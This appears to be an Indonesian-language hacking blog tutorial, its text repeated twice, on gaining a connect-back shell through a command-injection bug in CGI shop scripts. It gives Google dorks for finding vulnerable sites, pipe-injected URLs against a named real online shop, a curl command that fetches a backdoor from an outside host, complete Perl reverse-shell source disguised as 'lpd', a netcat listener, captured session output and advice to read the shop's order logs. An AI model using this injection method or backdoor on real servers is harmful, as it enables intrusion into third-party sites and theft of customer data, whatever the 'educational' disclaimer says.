Connect Back melalui Bug CGI

.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk
melaksanakan command-command untuk meng-eksploitasi sistem. Tetapi hal ini
juga dipengaruhi oleh settingan dari sistem tersebut apakah mengijinkan kita
untuk membuat/menulis File di Server tersebut.
Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug
Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat,
locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)
Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang
menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan
memasukkan keyword allinurl dengan tambahan bug diatas. Contoh, allinurl :
"shop.pl?seite". Maka kita akan dapat berbagai macam halaman yang dapat di-tes
bugnya. Pilih salah satu dan kita akan memulai mencoba connect back.
74
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara
char "||", maka perintah kita akan terlihat seperti ini : |perintah|, selain dengan
char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :
>> https://www.a66.de/cgilocal/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
Weikkss....Banyak filenya tuh :P
$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana
dengan perintah "id"
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892
Kalo benar maka akan tampak :
uid=290076(ade001) gid=103(web) groups=103(web)
Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D
$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt
http://www.goodwillco.com/tes.txt|&KNR=3055892
Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu
tes.txt, kalo sudah tidak ada silahkan copy-paste teks berikut kedalam Notepad
dan simpan dengan Ekstensi *.txt, Coding by 1St :D
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -
l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
<iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational
purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything
happened by the couse of using all information on these website.
# ---------
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
75
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)
Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan
nama back.txt
Kalo curl -o tidak bisa gunakan wget -o.
$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah terupload...
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl
honeymoonfinnishorder.pl honeymoonorder.pl ikonboard order.pl preise.pl remview.php
shop.cfg shop.pl
Tampaknya file backdoor kita sudah ada tuh :D
$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya
>
C:\>netcat.exe -lLvvp 9000
Catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi
komputer masing2 :D
Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut
$> Kita akan melakukan connectback dari server korban dengan meng-compile
file backdorr tsb :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx
9000|&KNR=3055892
catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port
tujuan yang sudah terbuka, jika komputer kita memakai proxy atau firewall
harap di konfigurasi ulang agar server korban bisa melakukan connectback
terhadap kita :D
76
Bila benar maka :
C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.
weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super
user tuh :(
Mungkin kita bisa liat groupnya :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892
DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow
hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt
pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d
yp.conf
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892
sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root
daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp
user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89:
staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104:
qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204:
dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme
mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp
Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana
ngerubahnya ??? sayangnya tutorial ini hanya membahas caraa kita untuk
melakukan connectback dengan menggunakan CGI BUG. Untuk lebih jelasnya
silakan cari artikel ttg hal tsb di Google :D
77
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya
mungkin !!!???? :D (ingat site ini adalah semacam online-shop :D), silakan
masukkan perintah locate order.log atau locate .log di browser anda :D
hehehehehehhe
Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor
dan kesabarannya dalam mengajari junior mu ini :D , admin www.a66.de
hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D n ndak
lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg
makin ciamik :D
-------(Any Comments, Suggestions, Critics, Questions Send an Email >
emomelodicfreak@yahoo.com)---------
Thanks, PusHm0v
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk
melaksanakan command-command untuk meng-eksploitasi sistem. Tetapi hal ini
juga dipengaruhi oleh settingan dari sistem tersebut apakah mengijinkan kita
untuk membuat/menulis File di Server tersebut.
Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug
Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat,
locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)
Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang
menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan
memasukkan keyword allinurl dengan tambahan bug diatas. Contoh, allinurl :
"shop.pl?seite". Maka kita akan dapat berbagai macam halaman yang dapat di-tes
bugnya. Pilih salah satu dan kita akan memulai mencoba connect back.
74
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara
char "||", maka perintah kita akan terlihat seperti ini : |perintah|, selain dengan
char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :
>> https://www.a66.de/cgilocal/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
Weikkss....Banyak filenya tuh :P
$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana
dengan perintah "id"
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892
Kalo benar maka akan tampak :
uid=290076(ade001) gid=103(web) groups=103(web)
Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D
$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt
http://www.goodwillco.com/tes.txt|&KNR=3055892
Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu
tes.txt, kalo sudah tidak ada silahkan copy-paste teks berikut kedalam Notepad
dan simpan dengan Ekstensi *.txt, Coding by 1St :D
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -
l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
<iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational
purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything
happened by the couse of using all information on these website.
# ---------
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
75
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)
Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan
nama back.txt
Kalo curl -o tidak bisa gunakan wget -o.
$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah terupload...
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl
honeymoonfinnishorder.pl honeymoonorder.pl ikonboard order.pl preise.pl remview.php
shop.cfg shop.pl
Tampaknya file backdoor kita sudah ada tuh :D
$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya
>
C:\>netcat.exe -lLvvp 9000
Catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi
komputer masing2 :D
Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut
$> Kita akan melakukan connectback dari server korban dengan meng-compile
file backdorr tsb :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx
9000|&KNR=3055892
catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port
tujuan yang sudah terbuka, jika komputer kita memakai proxy atau firewall
harap di konfigurasi ulang agar server korban bisa melakukan connectback
terhadap kita :D
76
Bila benar maka :
C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.
weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super
user tuh :(
Mungkin kita bisa liat groupnya :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892
DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow
hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt
pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d
yp.conf
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892
sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root
daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp
user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89:
staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104:
qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204:
dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme
mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp
Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana
ngerubahnya ??? sayangnya tutorial ini hanya membahas caraa kita untuk
melakukan connectback dengan menggunakan CGI BUG. Untuk lebih jelasnya
silakan cari artikel ttg hal tsb di Google :D
77
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya
mungkin !!!???? :D (ingat site ini adalah semacam online-shop :D), silakan
masukkan perintah locate order.log atau locate .log di browser anda :D
hehehehehehhe
Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor
dan kesabarannya dalam mengajari junior mu ini :D , admin www.a66.de
hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D n ndak
lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg
makin ciamik :D
-------(Any Comments, Suggestions, Critics, Questions Send an Email >
emomelodicfreak@yahoo.com)---------
Thanks, PusHm0v






0 comments:
Post a Comment